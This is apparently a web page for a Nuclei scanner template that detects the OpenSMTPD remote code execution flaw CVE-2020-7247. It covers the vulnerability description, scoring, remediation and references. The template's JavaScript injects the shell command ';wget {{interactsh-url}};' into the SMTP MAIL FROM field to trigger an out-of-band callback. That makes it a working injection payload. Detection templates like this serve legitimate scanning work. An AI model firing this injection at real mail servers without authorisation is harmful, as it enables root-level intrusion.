OpenSMTPD 6.4.0-6.6.1 - Remote Code Execution

ID: CVE-2020-7247

Severity: critical

Author: princechaddha

Tags: packetstorm,cve,cve2020,js,smtp,opensmtpd,network,rce,oast,kev,openbsd

Description

OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the “uncommented” default configuration. The issue exists because of an incorrect return value upon failure of input validation.

YAML Source

id: CVE-2020-7247

info:
  name: OpenSMTPD 6.4.0-6.6.1 - Remote Code Execution
  author: princechaddha
  severity: critical
  description: |
    OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code with the privileges of the OpenSMTPD process, potentially leading to a complete compromise of the affected system.
  remediation: OpenBSD users are recommended to install patches for OpenBSD 6.6
  reference:
    - https://www.openwall.com/lists/oss-security/2020/01/28/3
    - https://nvd.nist.gov/vuln/detail/CVE-2020-7247
    - https://github.com/openbsd/src/commit/9dcfda045474d8903224d175907bfc29761dcb45
    - http://www.openwall.com/lists/oss-security/2020/01/28/3
    - http://packetstormsecurity.com/files/156145/OpenSMTPD-6.6.2-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-7247
    cwe-id: CWE-755
    epss-score: 0.97504
    epss-percentile: 0.9998
    cpe: cpe:2.3:a:openbsd:opensmtpd:6.6:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: openbsd
    product: opensmtpd
  tags: packetstorm,cve,cve2020,js,smtp,opensmtpd,network,rce,oast,kev,openbsd

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      const smtp = require('nuclei/smtp');
      const client = new smtp.Client(Host,Port);
      const message = new smtp.SMTPMessage();
      message.From(From);
      message.To(To);
      message.Body(Msg);
      Export(client.SendMail(message));

    args:
      Host: "{{Host}}"
      Port: "8825"
      From: ";wget {{interactsh-url}};"
      To: "root"
      Msg: "Contact your security team if you do not expect this message"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: dsl
        dsl:
          - success == true
#         - response == true
        condition: and
# digest: 4a0a00473045022100dbb87b94ccc2e1991b3dcf425dc985b1eb305528d3cd621646c66889faa384bf022072d15648e999ad04c79bfe622ffcc87b351f026efce2851467fcde92c30f298c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "javascript/cves/2020/CVE-2020-7247.yaml"

View on Github